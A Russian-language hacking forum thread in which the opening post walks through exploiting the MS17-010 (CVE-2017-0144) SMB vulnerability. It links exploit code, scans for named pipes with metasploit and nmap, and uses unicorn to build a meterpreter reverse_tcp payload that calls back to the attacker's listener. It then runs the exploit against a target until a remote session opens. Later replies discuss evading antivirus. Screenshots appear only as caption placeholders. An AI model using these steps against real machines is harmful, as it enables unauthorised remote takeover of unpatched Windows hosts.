• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Статья CVE-2017-0144 |MS17-010

Tayrus

Tayrus

Grey Team
13.04.2017
360
731
Всем привет, сегодня я вам покажу как эксплуатировать CVE-2017-0144 начнем.
Качаем это:
Код:
https://www.exploit-db.com/exploits/42315/
и это :
Код:
https://github.com/worawit/MS17-010/blob/master/mysmb.py
и вот это:
Код:
https://github.com/trustedsec/unicorn
Кидаем все в одну папку и создаем файл:
Код:
touch _init_.py
Следующим шагом заходим в metasploit.
Пишем :
Код:
use auxiliary/scanner/smb/pipe_auditor
set rhosts <ваша цель>
run
Должно появиться это:
CVE-2017-0144 |MS17-010
Теперь пишем:
Код:
nmap -A -p 445 <ваша цель>
Нас интересует это:
CVE-2017-0144 |MS17-010
Далее пишем:
Код:
gedit <название файла скачанного отсюда https://www.exploit-db.com/exploits/42315/>
Там, где USERNAME, пишем что получили в nmap(guest)
Ищем этот фрагмент кода:
CVE-2017-0144 |MS17-010
Убираем комментарий с этой строчки:
CVE-2017-0144 |MS17-010
Приводим строчку в такой вид:
CVE-2017-0144 |MS17-010
Теперь создадим нагрузку:
Код:
python unicorn.py windows/meterpreter/reverse_tcp <ваш ip> <порт>
Открываем файл powershell_attack.txt копируем содержимое и вставляем сюда:
CVE-2017-0144 |MS17-010
Удалим кавычку в конце:
CVE-2017-0144 |MS17-010
Сохраняем файл.
Выставляем прослушку в metasploit :
Код:
use exploit multi/handler
set lport <port>
set lhost <ваш ip>
set payload  windows/meterpreter/reverse_tcp
exploit
Эксплуатируем:
Код:
python <название файла скачанного отсюда https://www.exploit-db.com/exploits/42315/> <ip цели> <pipe>(например netlogon)
Выполняем команду до тех пор пока не появиться это:
CVE-2017-0144 |MS17-010
Нам прилетает сессия)
CVE-2017-0144 |MS17-010
Протестировано на:
Код:
- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86
 
Последнее редактирование:
C

CHEATER

Well-known member
09.09.2017
79
42
У меня другая методика, я использую unicorn для обхода AV + показал как найти pipe
AV, обычно, смотрит на сигнатуры експлойта, да и тип полезной нагрузки в metasploit можно выбрать любой. Но, ваша тема хороша своей легковесностью и да, - тем, что вы показали пример експлуатации с использованием exploit db.
 
Tayrus

Tayrus

Grey Team
13.04.2017
360
731
AV, обычно, смотрит на сигнатуры експлойта, да и тип полезной нагрузки в metasploit можно выбрать любой. Но, ваша тема хороша своей легковесностью и да, - тем, что вы показали пример експлуатации с использованием exploit db.
Как говорил @SooLFaa
CVE-2017-0144 |MS17-010

CVE-2017-0144 |MS17-010

Если не веришь мне поставить на систему AV и попробуй через модуль metasploit, а потом через мой метод .
 
  • Нравится
Реакции: Dmitry88
C

CHEATER

Well-known member
09.09.2017
79
42
Как говорил @SooLFaa Посмотреть вложение 19038
Посмотреть вложение 19039
Если не веришь мне поставить на систему AV и попробуй через модуль metasploit, а потом через мой метод .
Позвольте уточнить один момент: какое отношение к powershell имеет вот это?
 
C

CHEATER

Well-known member
09.09.2017
79
42
Ты действовал по моему методу?
Нет, это просто изображение для наглядности.
Насколько я помню (возможно информация не верна, так-как все могло измениться) psexec avast не видит. Так что, оба метода должны закончится успешно.
P.S Вы можете взять классический eternalblue, написать: set payload windows/exec; set CMD calc.exe и посмотреть на результат.
 
  • Нравится
Реакции: Tihon49
Vertigo

Vertigo

Lex mea est Vulgate Linux
Gold Team
15.02.2017
1 156
3 392
Шикарная тема.Отлично раскрыты метод атаки и работа эксплойта.
Такие темы идут в золотой фонд форума.
Спасибо,с удовольствием читается.
 
E

Elektrolife

Happy New Year
21.10.2016
216
33
разве unicorn умеет делать reverse_tcp ? По моему там речь идёт только о reverse_https )) И кстати пайпы не так уж и часто находятся ( Из 15 тестируемы уязвимых машин только на одной увиделись пайпы. Хотя,подозреваю это от того,что нету кредов. Если вписать легитимные креды,увидит намного больше..

Статья понравилась )
 
Tayrus

Tayrus

Grey Team
13.04.2017
360
731
разве unicorn умеет делать reverse_tcp ? По моему там речь идёт только о reverse_https )) И кстати пайпы не так уж и часто находятся ( Из 15 тестируемы уязвимых машин только на одной увиделись пайпы. Хотя,подозреваю это от того,что нету кредов. Если вписать легитимные креды,увидит намного больше..

Статья понравилась )
Еще как умеет)) Предположительно, чтобы были пайпы на машине, должно быть включено сетевое обнаружение с гостевой учеткой
CVE-2017-0144 |MS17-010

CVE-2017-0144 |MS17-010

CVE-2017-0144 |MS17-010
 
Последнее редактирование:
  • Нравится
Реакции: Yakamara
S

skill

Active member
06.02.2018
39
26
Зачем писать одно и тоже только разными слова?? Об этой уязвимости написано много раз и все же вы ее жуете по сто раз, я по этому экспу в другой теме писал тоже самое

И этот эксп уже бесполезен

и кавычку можно и не удалять что на скрине и разобрав его до конца пишите типа копипаст
 
  • Нравится
Реакции: GlowFisch и andrey.system
Tayrus

Tayrus

Grey Team
13.04.2017
360
731
Зачем писать одно и тоже только разными слова?? Об этой уязвимости написано много раз и все же вы ее жуете по сто раз, я по этому экспу в другой теме писал тоже самое
Это связка эксплойтов.

И этот эксп уже бесполезен
Не соглашусь)
 
S

skill

Active member
06.02.2018
39
26
Где связка ? Пример
 
S

skill

Active member
06.02.2018
39
26
Недостойное поведение
Что и требовалось понять что мамкин хекер до конца не поняв что это пытается думать мега хакер
 
  • Нравится
Реакции: GlowFisch
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб